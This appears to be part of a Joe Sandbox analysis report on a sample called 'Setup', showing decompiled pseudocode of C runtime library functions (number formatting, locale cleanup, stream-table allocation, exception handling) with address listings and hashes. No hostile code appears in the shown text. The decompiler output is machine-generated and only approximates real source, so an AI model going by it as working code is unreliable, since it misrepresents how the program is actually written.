                                                                                                                                                                                              0x004206b1
                                                                                                                                                                                              0x004206b3
                                                                                                                                                                                              0x004206b6
                                                                                                                                                                                              0x004206b8
                                                                                                                                                                                              0x004206bf
                                                                                                                                                                                              0x004206ca
                                                                                                                                                                                              0x004206d3
                                                                                                                                                                                              0x0042069c
                                                                                                                                                                                              0x0042069c
                                                                                                                                                                                              0x0042069f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0042069f
                                                                                                                                                                                              0x004206bf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004206b6
                                                                                                                                                                                              0x004206a2
                                                                                                                                                                                              0x004206d8
                                                                                                                                                                                              0x004206df
                                                                                                                                                                                              0x004206e1
                                                                                                                                                                                              0x004206e6
                                                                                                                                                                                              0x004206e8
                                                                                                                                                                                              0x004206e1
                                                                                                                                                                                              0x0042060e
                                                                                                                                                                                              0x004206f1
                                                                                                                                                                                              0x004206fa
                                                                                                                                                                                              0x00420758
                                                                                                                                                                                              0x00420766

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: swprintf
                                                                                                                                                                                              • String ID: $$$$l
                                                                                                                                                                                              • API String ID: 233258989-1469801561
                                                                                                                                                                                              • Opcode ID: 4090ffedbbe85394690c9848b7eac5f020a0a03e76c6d2694159de44ee40d349
                                                                                                                                                                                              • Instruction ID: dbc513bbf3e7c22f9083f413fe58f33798bedce99fd283935f7a3f7ec4e30a92
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4090ffedbbe85394690c9848b7eac5f020a0a03e76c6d2694159de44ee40d349
                                                                                                                                                                                              • Instruction Fuzzy Hash: A3515270A0022DDBDF14CF55E955BEE7BB4FF84300F80819AE555A2282CB389AB5CF59
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00420790 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 76%
                                                                                                                                                                                              			E00420790(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed char _a20, signed int _a24) {
				signed char _v8;
				signed int _v12;
				intOrPtr _v16;
				int _v20;
				long _v132;
				char _v140;
				intOrPtr _v144;
				signed int _v145;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				signed char _v164;
				signed char _t78;
				void* _t92;
				signed int _t106;
				void* _t117;
				void* _t118;
				void* _t119;

				_t118 = __esi;
				_t117 = __edi;
				_t92 = __ebx;
				_v152 = __ecx;
				_v20 = 0x6c;
				if(E00420770(_a16) > 0 || (E0041DDC0(_a16) & 0x00002000) != 0) {
					_v156 = E00420770(_a16);
				} else {
					_v156 = 6;
				}
				_v16 = _v156;
				if(_v16 <= 0x24) {
					_v160 = _v16;
				} else {
					_v160 = 0x24;
				}
				_v144 = _v160;
				_v16 = _v16 - _v144;
				_v8 = 0;
				_v12 = 0;
				_t78 = E0041DDC0(_a16) & 0x00003000;
				if(_t78 == 0x2000) {
					asm("fldz");
					asm("fcomp qword [ebp+0x1c]");
					asm("fnstsw ax");
					if((_t78 & 0x00000041) != 0) {
						_v164 = 0;
					} else {
						_v164 = 1;
					}
					_v145 = _v164;
					if((_v145 & 0x000000ff) != 0) {
						asm("fchs");
					}
					while(1) {
						asm("fcomp qword [0x424d60]");
						asm("fnstsw ax");
						if((_t78 & 0x00000001) != 0 || _v8 >= 0x1388) {
							break;
						}
						_a24 = _a24 /  *0x424d58;
						_t78 = _v8 + 0xa;
						_v8 = _t78;
					}
					asm("fcomp qword [0x424d68]");
					asm("fnstsw ax");
					__eflags = _t78 & 0x00000041;
					if((_t78 & 0x00000041) == 0) {
						while(1) {
							__eflags = _v16 - 0xa;
							if(_v16 < 0xa) {
								goto L25;
							}
							asm("fcomp qword [ebp+0x1c]");
							asm("fnstsw ax");
							__eflags = _t78 & 0x00000001;
							if((_t78 & 0x00000001) == 0) {
								__eflags = _v12 - 0x1388;
								if(_v12 < 0x1388) {
									_a24 = _a24 *  *0x424d58;
									_v16 = _v16 - 0xa;
									_t106 = _v12 + 0xa;
									__eflags = _t106;
									_v12 = _t106;
									continue;
								}
							}
							goto L25;
						}
					}
					L25:
					__eflags = _v145 & 0x000000ff;
					if((_v145 & 0x000000ff) != 0) {
						asm("fchs");
					}
				}
				 *(_t119 - 8) = _a24;
				_push(_v144);
				E00420B30(_t92, _t117, _t118, __eflags, _v152, _a4, _a8, _a12, _a16, _a20 & 0x000000ff,  &_v132, _v8, _v12, _v16, swprintf( &_v132, 0x6c, E00420A50(_v152,  &_v140, 0x4c, E0041DDC0(_a16))));
				return _a4;
			}





















                                                                                                                                                                                              0x00420790
                                                                                                                                                                                              0x00420790
                                                                                                                                                                                              0x00420790
                                                                                                                                                                                              0x00420799
                                                                                                                                                                                              0x0042079f
                                                                                                                                                                                              0x004207b0
                                                                                                                                                                                              0x004207d5
                                                                                                                                                                                              0x004207c1
                                                                                                                                                                                              0x004207c1
                                                                                                                                                                                              0x004207c1
                                                                                                                                                                                              0x004207e1
                                                                                                                                                                                              0x004207e8
                                                                                                                                                                                              0x004207f9
                                                                                                                                                                                              0x004207ea
                                                                                                                                                                                              0x004207ea
                                                                                                                                                                                              0x004207ea
                                                                                                                                                                                              0x00420805
                                                                                                                                                                                              0x00420814
                                                                                                                                                                                              0x00420817
                                                                                                                                                                                              0x0042081e
                                                                                                                                                                                              0x0042082d
                                                                                                                                                                                              0x00420837
                                                                                                                                                                                              0x0042083d
                                                                                                                                                                                              0x0042083f
                                                                                                                                                                                              0x00420842
                                                                                                                                                                                              0x00420847
                                                                                                                                                                                              0x00420855
                                                                                                                                                                                              0x00420849
                                                                                                                                                                                              0x00420849
                                                                                                                                                                                              0x00420849
                                                                                                                                                                                              0x00420865
                                                                                                                                                                                              0x00420874
                                                                                                                                                                                              0x00420879
                                                                                                                                                                                              0x0042087b
                                                                                                                                                                                              0x00420889
                                                                                                                                                                                              0x0042088c
                                                                                                                                                                                              0x00420892
                                                                                                                                                                                              0x00420897
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004208ab
                                                                                                                                                                                              0x00420883
                                                                                                                                                                                              0x00420886
                                                                                                                                                                                              0x00420886
                                                                                                                                                                                              0x004208b3
                                                                                                                                                                                              0x004208b9
                                                                                                                                                                                              0x004208bb
                                                                                                                                                                                              0x004208be
                                                                                                                                                                                              0x004208cb
                                                                                                                                                                                              0x004208cb
                                                                                                                                                                                              0x004208cf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004208d7
                                                                                                                                                                                              0x004208da
                                                                                                                                                                                              0x004208dc
                                                                                                                                                                                              0x004208df
                                                                                                                                                                                              0x004208e1
                                                                                                                                                                                              0x004208e8
                                                                                                                                                                                              0x004208f3
                                                                                                                                                                                              0x004208fc
                                                                                                                                                                                              0x004208c5
                                                                                                                                                                                              0x004208c5
                                                                                                                                                                                              0x004208c8
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004208c8
                                                                                                                                                                                              0x004208e8
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004208df
                                                                                                                                                                                              0x004208cb
                                                                                                                                                                                              0x00420901
                                                                                                                                                                                              0x00420908
                                                                                                                                                                                              0x0042090a
                                                                                                                                                                                              0x0042090f
                                                                                                                                                                                              0x00420911
                                                                                                                                                                                              0x0042090a
                                                                                                                                                                                              0x0042091a
                                                                                                                                                                                              0x00420923
                                                                                                                                                                                              0x00420981
                                                                                                                                                                                              0x0042098f

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: swprintf
                                                                                                                                                                                              • String ID: $$$$l
                                                                                                                                                                                              • API String ID: 233258989-1469801561
                                                                                                                                                                                              • Opcode ID: bb34c917699b84620b1f3f74835e37f1cde0a454d6a2dc428bd1f8a75e3bdfa9
                                                                                                                                                                                              • Instruction ID: 691eb8090c57c05b81212952cb502a0cdc908d2af14f948f2686e7761e06dd54
                                                                                                                                                                                              • Opcode Fuzzy Hash: bb34c917699b84620b1f3f74835e37f1cde0a454d6a2dc428bd1f8a75e3bdfa9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 89517FB0E0012DDBDF14DF54E954BEE7BB4FF84300F40819AE459A2282CB389AA5CF59
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00408D4C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 78%
                                                                                                                                                                                              			E00408D4C(char _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t24;
				intOrPtr* _t25;
				intOrPtr _t26;
				intOrPtr* _t27;
				intOrPtr* _t28;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr* _t46;
				void* _t65;
				intOrPtr* _t66;
				intOrPtr* _t67;
				char _t69;

				_t69 = _a4;
				_t24 =  *((intOrPtr*)(_t69 + 0xbc));
				if(_t24 == 0 || _t24 == 0x4546c4) {
					L11:
					_t25 =  *((intOrPtr*)(_t69 + 0xc0));
					if(_t25 != 0) {
						_t81 =  *_t25;
						if( *_t25 == 0) {
							_push( *((intOrPtr*)(_t69 + 0xc4)) - 0xfe);
							E004055FF(0, _t65, _t69, _t81);
							_push( *((intOrPtr*)(_t69 + 0xcc)) - 0x80);
							E004055FF(0, 0x80, _t69, _t81);
							_t41 =  *((intOrPtr*)(_t69 + 0xd0)) - 0x80;
							_push( *((intOrPtr*)(_t69 + 0xd0)) - 0x80);
							E004055FF(0, 0x80, _t69, _t41);
							_push( *((intOrPtr*)(_t69 + 0xc0)));
							E004055FF(0, 0x80, _t69, _t41);
						}
					}
					_t15 = _t69 + 0xd4; // 0xd7
					_t66 = _t15;
					_t26 =  *_t66;
					if(_t26 != 0x454ec0) {
						_t84 =  *((intOrPtr*)(_t26 + 0xb4));
						if( *((intOrPtr*)(_t26 + 0xb4)) == 0) {
							E00410517(_t26);
							_push( *_t66);
							E004055FF(0, _t66, _t69, _t84);
						}
					}
					_t17 = _t69 + 0x50; // 0x53
					_t67 = _t17;
					_a4 = 6;
					do {
						if( *((intOrPtr*)(_t67 - 8)) != 0x454cb8) {
							_t27 =  *_t67;
							if(_t27 != 0) {
								_t87 =  *_t27;
								if( *_t27 == 0) {
									_push(_t27);
									E004055FF(0, _t67, _t69, _t87);
								}
							}
						}
						if( *((intOrPtr*)(_t67 - 4)) != 0) {
							_t28 =  *((intOrPtr*)(_t67 + 4));
							if(_t28 != 0) {
								_t90 =  *_t28;
								if( *_t28 == 0) {
									_push(_t28);
									E004055FF(0, _t67, _t69, _t90);
								}
							}
						}
						_t67 = _t67 + 0x10;
						_t22 =  &_a4;
						 *_t22 = _a4 - 1;
						_t91 =  *_t22;
					} while ( *_t22 != 0);
					_push(_t69);
					return E004055FF(0, _t67, _t69, _t91);
				} else {
					_t44 =  *((intOrPtr*)(_t69 + 0xb0));
					if(_t44 != 0 &&  *_t44 == 0) {
						_t45 =  *((intOrPtr*)(_t69 + 0xb8));
						if(_t45 != 0) {
							_t77 =  *_t45;
							if( *_t45 == 0) {
								_push(_t45);
								E004055FF(0, _t65, _t69, _t77);
								E00410934( *((intOrPtr*)(_t69 + 0xbc)));
							}
						}
						_t46 =  *((intOrPtr*)(_t69 + 0xb4));
						if(_t46 != 0) {
							_t79 =  *_t46;
							if( *_t46 == 0) {
								_push(_t46);
								E004055FF(0, _t65, _t69, _t79);
								E00410725( *((intOrPtr*)(_t69 + 0xbc)));
							}
						}
						_push( *((intOrPtr*)(_t69 + 0xb0)));
						E004055FF(0, _t65, _t69, _t79);
						_push( *((intOrPtr*)(_t69 + 0xbc)));
						E004055FF(0, _t65, _t69, _t79);
					}
					goto L11;
				}
			}



















                                                                                                                                                                                              0x00408d53
                                                                                                                                                                                              0x00408d56
                                                                                                                                                                                              0x00408d61
                                                                                                                                                                                              0x00408dd2
                                                                                                                                                                                              0x00408dd2
                                                                                                                                                                                              0x00408dda
                                                                                                                                                                                              0x00408ddc
                                                                                                                                                                                              0x00408dde
                                                                                                                                                                                              0x00408deb
                                                                                                                                                                                              0x00408dec
                                                                                                                                                                                              0x00408dfe
                                                                                                                                                                                              0x00408dff
                                                                                                                                                                                              0x00408e0a
                                                                                                                                                                                              0x00408e0c
                                                                                                                                                                                              0x00408e0d
                                                                                                                                                                                              0x00408e12
                                                                                                                                                                                              0x00408e18
                                                                                                                                                                                              0x00408e1d
                                                                                                                                                                                              0x00408dde
                                                                                                                                                                                              0x00408e20
                                                                                                                                                                                              0x00408e20
                                                                                                                                                                                              0x00408e26
                                                                                                                                                                                              0x00408e2d
                                                                                                                                                                                              0x00408e2f
                                                                                                                                                                                              0x00408e35
                                                                                                                                                                                              0x00408e38
                                                                                                                                                                                              0x00408e3d
                                                                                                                                                                                              0x00408e3f
                                                                                                                                                                                              0x00408e45
                                                                                                                                                                                              0x00408e35
                                                                                                                                                                                              0x00408e46
                                                                                                                                                                                              0x00408e46
                                                                                                                                                                                              0x00408e49
                                                                                                                                                                                              0x00408e50
                                                                                                                                                                                              0x00408e57
                                                                                                                                                                                              0x00408e59
                                                                                                                                                                                              0x00408e5d
                                                                                                                                                                                              0x00408e5f
                                                                                                                                                                                              0x00408e61
                                                                                                                                                                                              0x00408e63
                                                                                                                                                                                              0x00408e64
                                                                                                                                                                                              0x00408e69
                                                                                                                                                                                              0x00408e61
                                                                                                                                                                                              0x00408e5d
                                                                                                                                                                                              0x00408e6d
                                                                                                                                                                                              0x00408e6f
                                                                                                                                                                                              0x00408e74
                                                                                                                                                                                              0x00408e76
                                                                                                                                                                                              0x00408e78
                                                                                                                                                                                              0x00408e7a
                                                                                                                                                                                              0x00408e7b
                                                                                                                                                                                              0x00408e80
                                                                                                                                                                                              0x00408e78
                                                                                                                                                                                              0x00408e74
                                                                                                                                                                                              0x00408e81
                                                                                                                                                                                              0x00408e84
                                                                                                                                                                                              0x00408e84
                                                                                                                                                                                              0x00408e84
                                                                                                                                                                                              0x00408e84
                                                                                                                                                                                              0x00408e89
                                                                                                                                                                                              0x00408e94
                                                                                                                                                                                              0x00408d6a
                                                                                                                                                                                              0x00408d6a
                                                                                                                                                                                              0x00408d72
                                                                                                                                                                                              0x00408d78
                                                                                                                                                                                              0x00408d80
                                                                                                                                                                                              0x00408d82
                                                                                                                                                                                              0x00408d84
                                                                                                                                                                                              0x00408d86
                                                                                                                                                                                              0x00408d87
                                                                                                                                                                                              0x00408d92
                                                                                                                                                                                              0x00408d98
                                                                                                                                                                                              0x00408d84
                                                                                                                                                                                              0x00408d99
                                                                                                                                                                                              0x00408da1
                                                                                                                                                                                              0x00408da3
                                                                                                                                                                                              0x00408da5
                                                                                                                                                                                              0x00408da7
                                                                                                                                                                                              0x00408da8
                                                                                                                                                                                              0x00408db3
                                                                                                                                                                                              0x00408db9
                                                                                                                                                                                              0x00408da5
                                                                                                                                                                                              0x00408dba
                                                                                                                                                                                              0x00408dc0
                                                                                                                                                                                              0x00408dc5
                                                                                                                                                                                              0x00408dcb
                                                                                                                                                                                              0x00408dd1
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00408d72

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ___free_lc_time___free_lconv_mon___free_lconv_num
                                                                                                                                                                                              • String ID: 0bB
                                                                                                                                                                                              • API String ID: 1156122516-338892059
                                                                                                                                                                                              • Opcode ID: 636acd93ec5585c2df572f48629d4b6043b0e822e52db23ca0563df4997044e9
                                                                                                                                                                                              • Instruction ID: 4dcfe501280b987b88add4e7d48310c37583b7b760f6aab4f8d17f7657c2a74a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 636acd93ec5585c2df572f48629d4b6043b0e822e52db23ca0563df4997044e9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 75314B71500701EBDB20AF69D985A5B77A6EF50314F14093FE189B72D1CF38AD909B58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00407DBA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00407DBA() {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t10;
				void* _t12;
				intOrPtr _t15;
				intOrPtr* _t16;
				signed int _t19;
				signed int _t20;
				intOrPtr _t26;
				intOrPtr _t27;

				_t5 =  *0x457b40;
				_t26 = 0x14;
				if(_t5 != 0) {
					if(_t5 < _t26) {
						_t5 = _t26;
						goto L4;
					}
				} else {
					_t5 = 0x200;
					L4:
					 *0x457b40 = _t5;
				}
				_t6 = E0040A8A6(_t5, 4);
				 *0x456b38 = _t6;
				if(_t6 != 0) {
					L8:
					_t19 = 0;
					_t15 = 0x454700;
					while(1) {
						 *((intOrPtr*)(_t19 + _t6)) = _t15;
						_t15 = _t15 + 0x20;
						_t19 = _t19 + 4;
						if(_t15 >= 0x454980) {
							break;
						}
						_t6 =  *0x456b38; // 0x1f32158
					}
					_t27 = 0xfffffffe;
					_t20 = 0;
					_t16 = 0x454710;
					do {
						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x456a00 + (_t20 >> 5) * 4))));
						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
							 *_t16 = _t27;
						}
						_t16 = _t16 + 0x20;
						_t20 = _t20 + 1;
					} while (_t16 < 0x454770);
					return 0;
				} else {
					 *0x457b40 = _t26;
					_t6 = E0040A8A6(_t26, 4);
					 *0x456b38 = _t6;
					if(_t6 != 0) {
						goto L8;
					} else {
						_t12 = 0x1a;
						return _t12;
					}
				}
			}













                                                                                                                                                                                              0x00407dba
                                                                                                                                                                                              0x00407dc2
                                                                                                                                                                                              0x00407dc5
                                                                                                                                                                                              0x00407dd0
                                                                                                                                                                                              0x00407dd2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00407dd2
                                                                                                                                                                                              0x00407dc7
                                                                                                                                                                                              0x00407dc7
                                                                                                                                                                                              0x00407dd4
                                                                                                                                                                                              0x00407dd4
                                                                                                                                                                                              0x00407dd4
                                                                                                                                                                                              0x00407ddc
                                                                                                                                                                                              0x00407de3
                                                                                                                                                                                              0x00407dea
                                                                                                                                                                                              0x00407e0a
                                                                                                                                                                                              0x00407e0a
                                                                                                                                                                                              0x00407e0c
                                                                                                                                                                                              0x00407e18
                                                                                                                                                                                              0x00407e18
                                                                                                                                                                                              0x00407e1b
                                                                                                                                                                                              0x00407e1e
                                                                                                                                                                                              0x00407e27
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00407e13
                                                                                                                                                                                              0x00407e13
                                                                                                                                                                                              0x00407e2b
                                                                                                                                                                                              0x00407e2c
                                                                                                                                                                                              0x00407e2e
                                                                                                                                                                                              0x00407e34
                                                                                                                                                                                              0x00407e48
                                                                                                                                                                                              0x00407e4e
                                                                                                                                                                                              0x00407e58
                                                                                                                                                                                              0x00407e58
                                                                                                                                                                                              0x00407e5a
                                                                                                                                                                                              0x00407e5d
                                                                                                                                                                                              0x00407e5e
                                                                                                                                                                                              0x00407e6a
                                                                                                                                                                                              0x00407dec
                                                                                                                                                                                              0x00407def
                                                                                                                                                                                              0x00407df5
                                                                                                                                                                                              0x00407dfc
                                                                                                                                                                                              0x00407e03
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00407e05
                                                                                                                                                                                              0x00407e07
                                                                                                                                                                                              0x00407e09
                                                                                                                                                                                              0x00407e09
                                                                                                                                                                                              0x00407e03

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: __calloc_crt
                                                                                                                                                                                              • String ID: @kE$pGE
                                                                                                                                                                                              • API String ID: 3494438863-3915955779
                                                                                                                                                                                              • Opcode ID: 008d0dd3baa00eeabba3c402c4a94a64d5017bd02be8135e20701b0b4d1c9eef
                                                                                                                                                                                              • Instruction ID: 89cd1651dfa5a6edbc9b9fbdc48982ec8453c52c9e469017c3178c32fa4ccfe5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 008d0dd3baa00eeabba3c402c4a94a64d5017bd02be8135e20701b0b4d1c9eef
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A11E372B0A31147E7244A1DFC916663682AB95739B2581BBE501EB3D1E73CFC81428E
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00408689 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 28%
                                                                                                                                                                                              			E00408689(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E004085F7(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E00404D19(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E00408061(_t22, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_push(_t27);
				_push(_a4);
				_t20 = E004082DC(_t22,  *((intOrPtr*)(_t22 + 0xc)), _t25, _t26, _t27, _t31);
				if(_t20 != 0) {
					E00404CE0(_t20, _t27);
					return _t20;
				}
				return _t20;
			}











                                                                                                                                                                                              0x00408689
                                                                                                                                                                                              0x00408689
                                                                                                                                                                                              0x00408689
                                                                                                                                                                                              0x00408689
                                                                                                                                                                                              0x00408689
                                                                                                                                                                                              0x0040868e
                                                                                                                                                                                              0x00408692
                                                                                                                                                                                              0x00408694
                                                                                                                                                                                              0x00408697
                                                                                                                                                                                              0x00408698
                                                                                                                                                                                              0x00408699
                                                                                                                                                                                              0x0040869c
                                                                                                                                                                                              0x004086a1
                                                                                                                                                                                              0x004086a1
                                                                                                                                                                                              0x004086a4
                                                                                                                                                                                              0x004086a8
                                                                                                                                                                                              0x004086ab
                                                                                                                                                                                              0x004086b0
                                                                                                                                                                                              0x004086ad
                                                                                                                                                                                              0x004086ad
                                                                                                                                                                                              0x004086ad
                                                                                                                                                                                              0x004086b3
                                                                                                                                                                                              0x004086b8
                                                                                                                                                                                              0x004086ba
                                                                                                                                                                                              0x004086bd
                                                                                                                                                                                              0x004086c0
                                                                                                                                                                                              0x004086c1
                                                                                                                                                                                              0x004086c9
                                                                                                                                                                                              0x004086ce
                                                                                                                                                                                              0x004086d2
                                                                                                                                                                                              0x004086d5
                                                                                                                                                                                              0x004086d8
                                                                                                                                                                                              0x004086de
                                                                                                                                                                                              0x004086df
                                                                                                                                                                                              0x004086e2
                                                                                                                                                                                              0x004086ec
                                                                                                                                                                                              0x004086f0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004086f0
                                                                                                                                                                                              0x004086f6

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___BuildCatchObject.LIBCMT ref: 0040869C
                                                                                                                                                                                                • Part of subcall function 004085F7: ___BuildCatchObjectHelper.LIBCMT ref: 0040862D
                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 004086B3
                                                                                                                                                                                              • ___FrameUnwindToState.LIBCMT ref: 004086C1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.351270128.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.351264711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351297406.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351304103.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.351330492.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                              • API String ID: 2163707966-1018135373
